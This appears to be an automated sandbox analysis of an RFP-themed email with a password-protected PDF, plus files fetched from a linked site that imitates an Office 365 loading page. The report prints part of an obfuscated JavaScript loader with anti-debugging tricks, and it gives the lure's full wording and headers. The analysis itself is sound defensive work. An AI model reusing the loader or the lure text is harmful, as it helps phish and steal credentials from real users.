                            SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                            SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                            Malicious:false
                            Reputation:unknown
                            URL:https://bespoke.global-constructions.ca/favicon.ico
                            Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:ASCII text, with very long lines (3379)
                            Category:downloaded
                            Size (bytes):4210
                            Entropy (8bit):5.364580472613482
                            Encrypted:false
                            SSDEEP:
                            MD5:59087D72EEDCB7650C9D5D6088440DD3
                            SHA1:97B607FCE11F640E5764699038E50A76EB98944B
                            SHA-256:E0E3FB0FE5CA541950CF8DD213FBE9E8957A3DB0010B515AD01ADFF6CA908A3E
                            SHA-512:4F213391C01CFB017AB290007F3C7E66DB9B2A7A1EA4B4843DD52B0D7E5B1A5C04896BF1856806964F5A49C38A66403A8CDFE2C8C3EAF82C8318012F444DCD3F
                            Malicious:false
                            Reputation:unknown
                            URL:https://bespoke.global-constructions.ca/captcha/style.css
                            Preview:@font-face{font-family:FabricMDL2Icons;src:url('//res.cdn.office.net/owamail/20240308003.09/resources/fonts/o365icons-mdl2.woff') format('woff');font-weight:400;font-style:normal}@font-face{font-family:office365icons;src:url('//res.cdn.office.net/owamail/20240308003.09/resources/fonts/office365icons.woff?') format('woff');font-weight:400;font-style:normal}#loadingScreen{position:fixed;top:0;bottom:0;left:0;right:0;background-color:#fff}#loadingLogo{position:fixed;top:calc(50vh - 90px);left:calc(50vw - 90px);width:180px;height:180px}#MSLogo{position:fixed;bottom:36px;left:calc(50vw - 50px)}.dark #loadingScreen{background-color:#333}.darkNew #loadingScreen{background-color:#1f1f1f}.:root{--s:180px;--envW:130px;--envH:71px;--calW:118px;--sqW:calc(var(--calW) / 3);--sqH:37px;--calHH:20px;--calH:calc(var(--sqH) * 3 + var(--calHH));--calY:calc(var(--calH) + 20px);--calYExt:calc(var(--calH) - 80px);--calYOverExt:calc(var(--calH) - 92px);--flapS:96px;--flapH:calc(0.55 * var(--envH));--flapScal
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:HTML document, ASCII text, with very long lines (4914)
                            Category:downloaded
                            Size (bytes):5378
                            Entropy (8bit):5.38886062857593
                            Encrypted:false
                            SSDEEP:
                            MD5:EC35C76BCE6C198030DBAD80B58B15EB
                            SHA1:6756BA9784C794D777BD54F9740103E58A95BCB8
                            SHA-256:58C45591ED53CB5FF384943A9BB87CF5C52AB364CB71A7459BEFDB21AA97BC93
                            SHA-512:47AF76D8F8F7A38699A5958C95EF65606FFF8DCE6688F5891271F8BF387915C97211E6218A7436ADCA833FC1044BBE476481803847288C5C8E6DAFF958148DE5
                            Malicious:false
                            Reputation:unknown
                            URL:https://bespoke.global-constructions.ca/&redirect=2f820ca3d02493e0c64659894e20b8d1405b23abmain&uid=f253efe302d32ab264a76e0ce65be76967168e8e60e49
                            Preview:<!DOCTYPE html>.<html>.<head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0" />. <title></title>. <script src="js___/67168e8eb4a7f-0c7374a2dbe5f3544d97874beae753c6"></script>. <script src="b_/67168e8eb4a8a-0c7374a2dbe5f3544d97874beae753c6"></script>. <script src="js_/67168e8eb4a8b-0c7374a2dbe5f3544d97874beae753c6"></script>.</head>..<script type="text/javascript">.. function a0_0x2715(){var _0x50fd02=['send','3400551lUpwmh','querySelectorAll','src','textContent','apply','chain','createElement','onreadystatechange','gger','status','140mXaOxL','head','script','input','body','5449088SOoukH','icon','GET','endsWith','81866CYWTdX','link','action','shortcut\x20icon','home6dca65610bad709b07a9e6041699d6ce','readyState','\x5c+\x5c+\x20*(?:[a-zA-Z_$][0-9a-zA-Z_$]*)','title','(((.+)+)+)+$','18igjNRk','querySelector','search','55184jZPtDr','test','toString','string','rel','stylesheet','init','forEach','75366CvaQbz','co
                            File type:RFC 822 mail, Unicode text, UTF-8 (with BOM) text, with very long lines (347), with CRLF line terminators
                            Entropy (8bit):6.020964205539258
                            TrID:
                            • Text - UTF-8 encoded (3003/1) 100.00%
                            File name:[EXTERNAL] Redbrick Communications Request For Proposal .eml
                            File size:55'906 bytes
                            MD5:444c20f8162f2d53fd9c0c87e1ce97e5
                            SHA1:0e375d16441994421c68b95f339ae7b32fb98194
                            SHA256:aca675ed79973dc7edcedd2558a3affa929b2777afb107195864c7d6370f1552
                            SHA512:c813c7eca4ddbe3f56726c3f1219a1ddfb743fff897c0f5dd5361b84ac1434c75c7ec84e013b1d9c34cae6091cfaa648e356b86e9723095696b8130d70e3a044
                            SSDEEP:1536:j/KliSFOBFsaijMz61To/y8Kbpkj9R2wdJo:j/CiScwFUWqHo
                            TLSH:1E438017EF810D119B5B49A168CF7BFD3F3D1BCBAB62497025AB3A39064DCD286C5284
                            File Content Preview:...Received: from IA1PR12MB6483.namprd12.prod.outlook.com (::1) by.. IA1PR12MB7517.namprd12.prod.outlook.com with HTTPS; Mon, 21 Oct 2024 17:01:02.. +0000..ARC-Seal: i=2; a=rsa-sha256; s=arcselector10001; d=microsoft.com; cv=pass;.. b=Xvq6q3EZVweJY5+ES18B
                            Subject:[EXTERNAL] Redbrick Communications Request For Proposal
                            From:Andrea Montgomery <montgomery@redbrick.ca>
                            To:Undisclosed recipients:;
                            Cc:
                            BCC:
                            Date:Mon, 21 Oct 2024 16:54:55 +0000
                            Communications:
                            • Some people who received this message don't often get email from montgomery@redbrick.ca. Learn why this is important<https://aka.ms/LearnAboutSenderIdentification> Good Day, Please find attached an important RFP(Request For Proposal) from Redbrick Communications that requires your attention. File Pass key: rfp [RFP ID #19994] Issued: 21st of October 2024 Submission deadline: 21st of November 2024 Thanks, Andrea Montgomery, APR, Prosci Vice President, Redbrick Communications www.redbrick.ca<http://www.redbrick.ca/> My work day may look different from yours. Please do not feel the need to respond outside of your regular working hours.
                            Attachments:
                            • Redbrick Communications (RFP) ID#19994.pdf
                            Key Value
                            Receivedfrom YQBPR0101MB9855.CANPRD01.PROD.OUTLOOK.COM ([fe80::a28a:d37f:ae2f:5551]) by YQBPR0101MB9855.CANPRD01.PROD.OUTLOOK.COM ([fe80::a28a:d37f:ae2f:5551%5]) with mapi id 15.20.8069.027; Mon, 21 Oct 2024 16:54:55 +0000
                            ARC-Seali=1; a=rsa-sha256; s=arcselector10001; d=microsoft.com; cv=none; b=UwGqb+76vqv2eSlQjZHTBSQJb6GcFWIeXVhX9XG5aSVDIh7iWCYKEd6eQKG+uOEv5xW4c1enA5eLgdUZV7i/+l5iQTWvBX8DMTig6DbWI8a74O685LAX1Y8FAWQSqKpxHFEux3UcTfquaiJKdGN6DsPSndGwFPMADSp9bnOyu8nC0EpNap9Z1u0gksFwOBHxl0NGEvsO7/2l/lglnx+qEICKCpcELv1zEyN8B77B1/BqS2ahy8MzZPYHBepCZaMqFvS/aI8XJyAuDLaG3e1KGdDJ6WAjfJM0muKmNWQLRDkVXa0w4GDV1isrc7RC+jbsN06dpr/VBI2d+SAbcVvDfw==
                            ARC-Message-Signaturei=1; a=rsa-sha256; c=relaxed/relaxed; d=microsoft.com; s=arcselector10001; h=From:Date:Subject:Message-ID:Content-Type:MIME-Version:X-MS-Exchange-AntiSpam-MessageData-ChunkCount:X-MS-Exchange-AntiSpam-MessageData-0:X-MS-Exchange-AntiSpam-MessageData-1; bh=nruMv/1CrnQ2lmwcvZwEGY5zmtaEggE8gf4GR96WCj8=; b=vvUP3tlTUV1+fmREKgdMFa9V6E2/5Kralz86YwK4YgTOzMF8iHpdkBOMD+jHq+IkQvo54vWg8TXIrMiMVeMWtbAGfvkr23NB09LDRhQ51EsiA18Z2CI0znLYM8H8cXSW9xwvKEVQ6M9JJnWi/Yip2FpqEDt5za/BQCq9uEeKEKOYoz2kq2vA+2T7gZc9jFKhNlj3JGRxTXHOxn2022ykiP8FRidKsqHhpzLraD+VonDpZ0b3GnzQDJ+cl3Kycp60B9aCcTOCrgxF3CtrdEOpH1fcZlHQ+E8V/v9HJac6PMf0NsKAPLuSPRxEMyM3gi15HU7CQHjaqnvX8O68/3B7nQ==
                            ARC-Authentication-Resultsi=1; mx.microsoft.com 1; spf=pass smtp.mailfrom=redbrick.ca; dmarc=pass action=none header.from=redbrick.ca; dkim=pass header.d=redbrick.ca; arc=none
                            Authentication-Resultsspf=pass (sender IP is 52.101.191.76) smtp.mailfrom=redbrick.ca; dkim=pass (signature was verified) header.d=redbrick.ca;dmarc=pass action=none header.from=redbrick.ca;compauth=pass reason=100
                            Received-SPFPass (protection.outlook.com: domain of redbrick.ca designates 52.101.191.76 as permitted sender) receiver=protection.outlook.com; client-ip=52.101.191.76; helo=YQZPR01CU011.outbound.protection.outlook.com; pr=C
                            DKIM-Signaturev=1; a=rsa-sha256; c=relaxed/relaxed; d=redbrick.ca; s=selector1; h=From:Date:Subject:Message-ID:Content-Type:MIME-Version:X-MS-Exchange-SenderADCheck; bh=nruMv/1CrnQ2lmwcvZwEGY5zmtaEggE8gf4GR96WCj8=; b=aILQxYJ2uyYqDcnppeUEJuYMVO5+4Z5DO1JbI6RZjayhKlwnayG52t3NGz83BpYIvmeyUx+2xV4RIfwQYYPGMWDPHiCYXXfD9qU21NhMpFI46Kgr+UiIoOPEWe4MzOW9hEyJNpewez/V6S+PEa125IGxzFJs20nFBHLzaAxSWNa3sTCg2tq8XvNkPGu4PrvrevUgnfoTQY46605Uo88Cc+LmtU6qYAmvKb+cG6Dl8kYHYlc3e6hlxFU7s6l135L5UVlR9QhzkjOssrRovF7te5bx8LAGPafutwbnKAqptTIF9HajEGGC9/ukgNIvP8qZtoSINgzFRv5lYc4r3BCCHg==
                            FromAndrea Montgomery <montgomery@redbrick.ca>
                            Subject[EXTERNAL] Redbrick Communications Request For Proposal
                            Thread-IndexAQHbIhu2NNBbSFix90a6MYAZFrXYPA==
                            DateMon, 21 Oct 2024 16:54:55 +0000
                            Message-ID <YQBPR0101MB9855354968F0C06AAFD577DEC7412@YQBPR0101MB9855.CANPRD01.PROD.OUTLOOK.COM>
                            Accept-Languageen-US
                            Content-Languageen-US
                            X-MS-Has-Attachyes
                            X-MS-TNEF-Correlator
                            msip_labels
                            Authentication-Results-Originaldkim=none (message not signed) header.d=none;dmarc=none action=none header.from=redbrick.ca;
                            x-ms-traffictypediagnostic YQBPR0101MB9855:EE_|YT2PR01MB5307:EE_|YT1PEPF00001E8D:EE_|IA1PR12MB6483:EE_|IA1PR12MB7517:EE_
                            X-MS-Office365-Filtering-Correlation-Idd389e853-fdde-40f2-da0b-08dcf1f11872
                            x-ms-exchange-senderadcheck1
                            x-ms-exchange-antispam-relay0
                            X-Microsoft-Antispam-Untrusted BCL:0;ARA:13230040|376014|7416014|366016|1800799024|3613699012|8096899003|38070700018;
                            X-Microsoft-Antispam-Message-Info-Original DDM3HziCrngxX9o4iojTWGvcqpClPRQb4w0IEqbY72YnBDl2BrUv1UkgKBAcbj9ZYSzDyyYMBlLZyoRjlPVg/A59AHZW0xC9f03C5tb68UJSmM6rjGmR+/cGge/DpcDsn2o45LLsK97fqUj9INtBJOkEGcwWlIX9ZRsT++mjUPNOlXCwIy5Whw26LVIZX8bC5Qr2kF0bvZUdwySvgi+Nha96Y83kega5mhQbsBpr0OlD+QfRdG+uoUv1fygrLgGQMO7rRrh3R6fULxMmqGIal4jqLBpKEYaxrUUrtVU8nzfU/F3djbPbqzQu+MiaLpLv/wp89bS7ByBo+Nhak2ciInIaxNbLeOjdXCdEEDv4aYO9/vLnft40+lSRzq82B1BS2EIHSDn4q0WvYwdtHaBFt/he7qkaQBO9X9qgh8bVVBtj2+E8rUYbuIJ14tR1+j+YyvbHuavVBJcT4t+RqTN6rJHRxbRS2Tjxyf39zZv+pEVV6gpXrXTRBsS51ixSSIvP1uCQ5xVuMOTpa932tx+ghOJgTxiBWZAnZccHxau6KgNqlJghW/KS5hzWcLb1Cq2rCVBAuUsIM/V3uaGpaqyu61czWPoh4F1owHL/mtq+KK+e0iLxHGqzAQGHZ5MH8vll+bgv/KwY+iacbddciF/0V9qVDU6QJBuzyK0juuxln2imLJsF1Byz1rcUHBgjUFeVP/572mpH+3ymcZdvD8JVXQr9WLGV+Q7BGdQoeNmXYwjHc5Q1RaJXWfA0AtZJtfmNzZveHY08GSwuDN0ygF8T0pRT/vGZ9xmcYS2oQwJqznxQx4CUtnODg+BQdWEmGlxbbN5QcjIhyuU53BU19tcy3rT26CEOmvsxXjGaFWOakuTUoFzsYLZaKmlmX/64OYh4FgF+r2KnnBJ/+ZhSF1elTR01r2lvl+RJS1hvjGsu4npEG9jDYnfKDLH83F2E2eyDwfImaPSN7umVvCplGS5M6p+REyFY2O6JljYciHqFWfM8He9pAyPmI5LdZOnd/JpqMwZBKTp77/Gxyg2Tdv74Cmee6wBpEz17yq0Y7sqra2gAAwVPOSD7V4UV/BkbMCPi2wWQual5kAnDZ84U4yS43eGLMFCr3rNMxeVTOy6Q78lxW4sS/z5J6U7ksehteWFSMGofRVp3lpCrJnKUQ8MhDiS0ljkbJKXibpf+npX4rFcEei+VK78ZFdUwiPw4CPGsWBb3RmbipEOnwhaDvCdgc8BQP8FcFZWTjZN9BFor9MGIpZ6vdqJuif6LvAzusUdKPd+ifFGlIZmLo1UHV2rjIM3mMZCdfPojrxGoj742Kj8=
                            X-Forefront-Antispam-Report-Untrusted CIP:255.255.255.255;CTRY:;LANG:en;SCL:1;SRV:;IPV:NLI;SFV:NSPM;H:YQBPR0101MB9855.CANPRD01.PROD.OUTLOOK.COM;PTR:;CAT:NONE;SFS:(13230040)(376014)(7416014)(366016)(1800799024)(3613699012)(8096899003)(38070700018);DIR:OUT;SFP:1102;
                            X-MS-Exchange-AntiSpam-MessageData-Original-ChunkCount1
                            X-MS-Exchange-AntiSpam-MessageData-Original-0 dfjZLhijCHDHaBsC9jGFzedJyBQwHa7aNAV+sTSsPSIeSkjvf8qutDGX4ziQsfD20MV2V0i+BXgSkB8ABCxk5P/QAR0Nd/e2b2+ddMCXr8Es1qMNypa1bRoW/kMDbS7AHwZXSxzFYq87C23KfGV/5E4UDXIUtEpS4EJyqQZQf2poXpycLnq59ZEGcS+AzrzZpC3xt1avtAVqJ4McZByoISe+QmPc1ePalDZ3GwI8WURDoqkEn3sw9BPOd498Mbb3x9jgUtT68eFlqeSpAEiXB/TtxIMh/A0gQAY66FNV15uiJ9RxO88bmv8m4qfI+VuircZab8lh926YDu0H7fNHi4EZFV1reXTioiLQfCqzSuaUDX78G4PNNHOy5r5pJ7iIPrcXXDbJWv89hxbH0uIlqoGrHbF0kPG34ICseoiEe2j16Jvxo6+kjN3eZxnoP6R6xwEQJI2id1vkfpn5qqp8tQEmIZPE5QIdYq0xnsCsiywGjKX/aTCkyNG319MxNoHecfOHimBkN3CPmXTMrtWah+C50zDFFQwv5KpKV7shdENQqpVqZ7VQqOcWs9Bvx/dmRYBxfD3/75WUJMNRbPtHsGzNKIeOk9EDqHXFpgIaonDHZXMhMJNUB56rkPBoyvuCa9tDCHOjAgNFWT05MK7KNot2g/7GKeJO2GIqtRttJy6DGIcgnpeQ80QJ/PVbBgEvJNHLmSowPcut/LZbqxJkv86ypJFzkNtJpjCwdlpptxB/feqz7hsNMWcVPmTLkIM/acu/JRuPnnvJfX+wfYoRHi23uYYBpDaIlpFJ+nZL+aSBEJ9AR1qeX9H9vp66o5dRSBiE3mIlSMNjl0+qCGUMuNF2VxyFCBcZXkNINuG0mgu0G5+vQn7wClcJgCbEtexLM+bx8RxdtMwf5kRrGE400NalEVbdLpsPxudaULuuGFMvrMuthHNUmWNuebBODPeaCorhgMgWK2mAUPfB97SZMMHQWPwz4ouGvR1A7mEqorYFTFSNci4w77+og8vKXO/sFrDBOG3i3dV2F0HOz+zf3OY3Ajr8f+Nuecr0JgHnmB0BKs3yg6IEpvZQY5z6VX/rSozpDqVB+Bi+Z5wpDLoX9fQv3s5MB9Bkf9t99XAj5HJNCowrYfnlBreC5hgqgTwrKyEMSXT32WCwRWRt46jAixmOtIdki7yS2P/B7+I85GlsbrRc1ih6yRIu+dqoDB+unyy0+gnOAp+p0H9ZbBk0K2+hse66pQ66e7j06/1uxp06oo3XrznQksM2mtnAnHUQK71bkBuZQ899Qav5WiHYXaheQcD4W6q3+XgB5g8j4z79sGsjgbIVhxdOqzmGwERrFXI81uWG22p0nAIbi7IbWn9QAx1xJa1SsSJzZ8vkWHH57P+mgf2r4dMHEffofVsxD0Sw/ejnMn8qlJWrq5ZwU7RoB/3Wukfe3wOe+7V2NhgUGKHxTHi16HCgfA1R4OAjfpnogn4GqRBVJ8e8cMUSFC9C9TACJ6A4kz1BSvTZJVeUh7bpAaaIPWczRKE/frg1FOlPzqri2Lw/S8tTF3zfQ+2ROQvPy/qBaFPbNw8Ois8zwmR5UJGSGJgX0byazPJQ
                            Content-Typemultipart/mixed; boundary="_004_YQBPR0101MB9855354968F0C06AAFD577DEC7412YQBPR0101MB9855_"
                            X-MS-Exchange-Transport-CrossTenantHeadersStampedIA1PR12MB6483
                            ToUndisclosed recipients:;
                            Return-Pathmontgomery@redbrick.ca
                            X-MS-Exchange-Organization-ExpirationStartTime21 Oct 2024 16:54:57.9360 (UTC)
                            X-MS-Exchange-Organization-ExpirationStartTimeReasonOriginalSubmit
                            X-MS-Exchange-Organization-ExpirationInterval1:00:00:00.0000000
                            X-MS-Exchange-Organization-ExpirationIntervalReasonOriginalSubmit
                            X-MS-Exchange-Organization-Network-Message-Id d389e853-fdde-40f2-da0b-08dcf1f11872
                            X-EOPAttributedMessage0
                            X-EOPTenantAttributedMessagec868558f-a1c1-46fc-821d-aed53bb48125:0
                            X-MS-Exchange-Organization-MessageDirectionalityIncoming
                            X-MS-Exchange-Transport-CrossTenantHeadersStripped YT1PEPF00001E8D.CANPRD01.PROD.OUTLOOK.COM
                            X-MS-Exchange-Transport-CrossTenantHeadersPromoted YT1PEPF00001E8D.CANPRD01.PROD.OUTLOOK.COM
                            X-MS-PublicTrafficTypeEmail
                            X-MS-Exchange-Organization-AuthSource YT1PEPF00001E8D.CANPRD01.PROD.OUTLOOK.COM
                            X-MS-Exchange-Organization-AuthAsAnonymous
                            X-MS-Office365-Filtering-Correlation-Id-Prvs 3a9adbe2-c33f-4d9f-16ef-08dcf1f116f6
                            X-MS-Exchange-AtpMessagePropertiesSA|SL
                            X-MS-Exchange-EnableFirstContactSafetyTipEnable
                            X-MS-Exchange-Organization-SCL1
                            X-Microsoft-AntispamBCL:0;ARA:13230040|35042699022|3613699012|8096899003;
                            X-Forefront-Antispam-Report CIP:52.101.191.76;CTRY:CA;LANG:en;SCL:1;SRV:;IPV:NLI;SFV:NSPM;H:YQZPR01CU011.outbound.protection.outlook.com;PTR:mail-canadaeastazon11020076.outbound.protection.outlook.com;CAT:NONE;SFTY:9.25;SFS:(13230040)(35042699022)(3613699012)(8096899003);DIR:INB;SFTY:9.25;
                            X-MS-Exchange-CrossTenant-OriginalArrivalTime21 Oct 2024 16:54:57.8578 (UTC)
                            X-MS-Exchange-CrossTenant-Network-Message-Idd389e853-fdde-40f2-da0b-08dcf1f11872
                            X-MS-Exchange-CrossTenant-Idc868558f-a1c1-46fc-821d-aed53bb48125
                            X-MS-Exchange-CrossTenant-AuthSourceYT1PEPF00001E8D.CANPRD01.PROD.OUTLOOK.COM
                            X-MS-Exchange-CrossTenant-AuthAsAnonymous
                            X-MS-Exchange-CrossTenant-FromEntityHeaderInternet
                            X-MS-Exchange-Transport-EndToEndLatency00:06:05.0123288
                            X-MS-Exchange-Processed-By-BccFoldering15.20.8069.027
                            X-Microsoft-Antispam-Mailbox-Delivery ucf:0;jmr:0;auth:0;dest:I;ENG:(910001)(944506478)(944626604)(920097)(930097)(140003);
                            X-Microsoft-Antispam-Message-Info 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
                            MIME-Version1.0

                            Icon Hash:46070c0a8e0c67d6